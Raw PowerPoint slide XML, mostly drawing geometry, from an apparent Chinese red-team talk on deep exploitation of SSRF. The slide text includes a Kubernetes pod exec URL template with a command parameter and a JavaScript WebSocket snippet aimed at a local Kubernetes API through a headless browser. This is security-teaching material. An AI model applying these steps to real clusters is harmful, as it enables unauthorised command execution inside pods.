          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4509135" y="2481749"/>
            <a:ext cx="4126039" cy="639276"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3582034" h="554989">
                <a:moveTo>
                  <a:pt x="3483609" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5587" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="403098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269" y="406146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147192" y="554736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3581780" y="554736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3581780" y="549402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149478" y="549402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6095" y="403479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5333" y="401700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5333" y="8509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8635" y="5334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3488943" y="5334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="348360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7" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8519168" y="2487893"/>
            <a:ext cx="119224" cy="600509"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="103504" h="521335">
                <a:moveTo>
                  <a:pt x="7619" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97789" y="97662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97789" y="521208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103124" y="521208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103124" y="95503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761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8" name="object 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8534380" y="2595852"/>
            <a:ext cx="131659" cy="509079"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="114300" h="441960">
                <a:moveTo>
                  <a:pt x="114300" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="108966" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108966" y="403860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76326" y="436625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="436625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="441960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78612" y="441960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114300" y="406146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1143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58" name="矩形 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5205376" y="2557314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algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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SSRF</a:t>
            </a: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的结合</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" spc="-25" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00D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1" name="标题 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="756789" y="27496"/>
            <a:ext cx="6096073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3" name="矩形 62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object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E83C5AD-82E3-462D-8590-4B344E5DB1F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5894076" y="3476075"/>
            <a:ext cx="1600047" cy="31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155"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc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SSRF + SSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260155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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="756790" y="27496"/>
            <a:ext cx="5890590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3" name="矩形 62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34FB582-870E-4041-AFB0-3D675AED3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5" y="2223805"/>
            <a:ext cx="13245533" cy="3079855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA095CE1-D26E-473D-A197-D422B347CB84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="224812" y="1201230"/>
            <a:ext cx="4126039" cy="639276"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3582034" h="554989">
                <a:moveTo>
                  <a:pt x="3483609" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5587" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="403098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269" y="406146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147192" y="554736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3581780" y="554736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3581780" y="549402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149478" y="549402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6095" y="403479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5333" y="401700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5333" y="8509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8635" y="5334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3488943" y="5334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="348360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3" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B580BEC3-933A-4C15-ADBC-D0D46D8992F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4234845" y="1207374"/>
            <a:ext cx="119224" cy="600509"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="103504" h="521335">
                <a:moveTo>
                  <a:pt x="7619" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97789" y="97662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97789" y="521208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103124" y="521208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103124" y="95503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761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4" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29856958-F94D-4ADB-B78C-1B6C45357CD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4250057" y="1315333"/>
            <a:ext cx="131659" cy="509079"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="114300" h="441960">
                <a:moveTo>
                  <a:pt x="114300" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="108966" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108966" y="403860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76326" y="436625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="436625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="441960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78612" y="441960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114300" y="406146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1143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72B4C9-E2E8-41F7-B624-C11DCA5BFFC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064889" y="1276795"/>
            <a:ext cx="20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algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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SSRF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9383D7-6AED-48F2-81EC-26817CE69A6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4810211" y="1287069"/>
            <a:ext cx="244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回显页面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303673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标题 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2309931" y="2384425"/>
            <a:ext cx="9468212" cy="742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红蓝对抗中的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SSRF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深入利用实战</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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88" name="组 92"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2164360" y="2189480"/>
            <a:ext cx="9669547" cy="1205865"/>
            <a:chOff x="1926099" y="1318089"/>
            <a:chExt cx="4380104" cy="1323213"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1389" name="object 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2002173" y="1333202"/>
              <a:ext cx="4304030" cy="1308100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4304030" h="1308100">
                  <a:moveTo>
                    <a:pt x="4296664" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4268597" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4281551" y="4699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4288536" y="16510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4288790" y="871601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4288790" y="877062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4286758" y="882015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3883152" y="1292606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1292606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1307719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3889502" y="1307719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4293743" y="896493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4300982" y="885698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4303903" y="873125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4303903" y="20193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4300982" y="6223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429666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390" name="object 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1994679" y="1318089"/>
              <a:ext cx="4304665" cy="1243330"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4304665" h="1243329">
                  <a:moveTo>
                    <a:pt x="4276090" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="284099" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281813" y="2159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="284353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1243076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15113" y="1243076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15113" y="290575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290322" y="15112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4304157" y="15112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4300728" y="10032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4289171" y="2540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427609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391" name="object 68"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1926099" y="1596980"/>
              <a:ext cx="323215" cy="1003300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="323215" h="1003300">
                  <a:moveTo>
                    <a:pt x="15113" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="901826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100965" y="1002791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323088" y="1002791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323088" y="987678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107315" y="987678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15113" y="895603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sp>
        <p:nvSpPr>
          <p:cNvPr id="1395" name="文本框 1394"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5618388" y="3792799"/>
            <a:ext cx="2831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演讲人： 徐博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开放的端口信息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简单的页面回显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业务容器化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90" y="27496"/>
            <a:ext cx="5342006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2827428-DBFD-4E85-87BA-28A76B3599B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4766733" y="3869761"/>
            <a:ext cx="4072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思考：我们能做什么？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45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428253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C2FD26-238F-4162-9FC2-4FD14838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5" y="908130"/>
            <a:ext cx="7409524" cy="3609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723E47-5FC8-41C7-9FD2-390D3F664DDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7282736" y="4939602"/>
            <a:ext cx="6505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http://ip:8080/api/v1/namespaces/{namespace}/pods/{pod}/exec?container={container_name}&amp;command={command}&amp;stdin=1&amp;stdout=1&amp;tty=1&amp;stderr=1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766249-9DA3-4EE2-9642-120B58E8B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95" y="840783"/>
            <a:ext cx="3047619" cy="17523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2409CB-B0EF-4468-8C72-CCA55451C76C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9345335" y="2712892"/>
            <a:ext cx="297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AF2E6-E492-453C-B88D-6AB53EF4D948}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9345335" y="3549247"/>
            <a:ext cx="304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执行命令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EBBE46-CDF8-4B92-B435-6C07D5000A6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7282736" y="4939602"/>
            <a:ext cx="6408097" cy="1041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0516FC7-9F48-4576-941B-8A8769D7C741}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10249564" y="3982814"/>
            <a:ext cx="619580" cy="92333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F807F0B4-240C-4B9C-A27B-8A7487075DE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6142946" y="4998811"/>
            <a:ext cx="619580" cy="92333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B569ED-2166-478D-9566-999FAAEE5F3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1670526" y="5260421"/>
            <a:ext cx="413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只支持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val="29334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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="756789" y="27496"/>
            <a:ext cx="5726203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3" name="矩形 62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A932683-787F-4E19-A442-C225A936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61" y="487465"/>
            <a:ext cx="5970591" cy="29558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3D0306-0C16-4030-AE93-EC6B465A3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14" y="3656466"/>
            <a:ext cx="11038738" cy="2454396"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D4E13C2-2681-4A45-A038-02D311B80240}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="224812" y="1201230"/>
            <a:ext cx="4126039" cy="639276"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3582034" h="554989">
                <a:moveTo>
                  <a:pt x="3483609" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5587" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="403098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1269" y="406146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147192" y="554736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3581780" y="554736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3581780" y="549402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149478" y="549402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6095" y="403479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5333" y="401700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5333" y="8509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8635" y="5334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3488943" y="5334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="348360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B2206F-AA3A-4A4D-8616-4852B907360F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064889" y="1276795"/>
            <a:ext cx="20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algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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另一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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SSRF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8CA7DD-C969-4BFC-B700-DCB11D381059}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4810211" y="1287069"/>
            <a:ext cx="244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页面截图</a:t>
            </a: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00C4F249-0D92-45B9-BCF8-92E0B1C82CB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4234845" y="1207374"/>
            <a:ext cx="119224" cy="600509"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="103504" h="521335">
                <a:moveTo>
                  <a:pt x="7619" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97789" y="97662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97789" y="521208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103124" y="521208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103124" y="95503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761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C9072C48-0F7E-45AB-9701-C31F0E95BB9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4250057" y="1315333"/>
            <a:ext cx="131659" cy="509079"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="114300" h="441960">
                <a:moveTo>
                  <a:pt x="114300" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="108966" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108966" y="403860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76326" y="436625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="436625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="441960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78612" y="441960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114300" y="406146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1143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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146601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6264722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913603-EC3C-481A-8A4F-C1B89AF2F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51" y="663349"/>
            <a:ext cx="6908388" cy="17049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D85E29-A516-4474-BD3A-1A08129C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8" y="4096794"/>
            <a:ext cx="1171679" cy="17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FF7F0C-963E-40C8-A27B-2122E7F4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779" y="4340396"/>
            <a:ext cx="1461393" cy="146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1712541-9CC2-4458-91CE-8EEF454D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82" y="4089383"/>
            <a:ext cx="1963417" cy="19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1691EB-F716-4FE9-B496-79294B857826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4861568" y="3288824"/>
            <a:ext cx="162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Puppeteer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44948E-DF98-45A5-963E-D49C99F8D1EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7659148" y="3271706"/>
            <a:ext cx="286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Headless browser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F4B89F0F-B755-49AC-977E-940DA40DACB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6807457" y="2404057"/>
            <a:ext cx="637636" cy="884767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46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824179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F533BCE-5ACA-4148-808A-F9C7A6FA9BA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2160092" y="3301698"/>
            <a:ext cx="9487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    var target = "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://127.0.0.1:8080/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/v1/namespaces/default/pods/……"  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0B344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var 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 = new WebSocket(target, "base64.channel.k8s.io");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AF610C-B1F8-48D9-82F0-35E2A60BF5FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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665B5403-5225-40A2-AE80-CAAB31D0391C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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C96FD867-D2C9-4E63-9C4F-42B605706956}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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82A60E48-393F-4841-9D65-9A22D2F9C426}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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FC04C29C-FAB5-4227-810C-72BF8EFE5C34}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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AF25F76F-0BC5-4E91-8768-47ECF375FCD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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275D036A-7A76-4D53-8F24-F4D66B95F378}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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1D9DB21D-A1EE-460B-B060-355D2EB56361}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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3" name="object 75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF73A4F4-EB23-43B6-86EC-B4CB3867026B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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A60D34C-5430-40B5-A3D4-06C48E5B9431}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919605" y="1721485"/>
            <a:ext cx="1020381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K8s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exec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浏览器可以发送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6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5397430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2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5D784DE-F42A-41A7-AE82-F73F117D6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24" y="994253"/>
            <a:ext cx="9344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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4509135" y="2481749"/>
            <a:ext cx="4126039" cy="639276"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
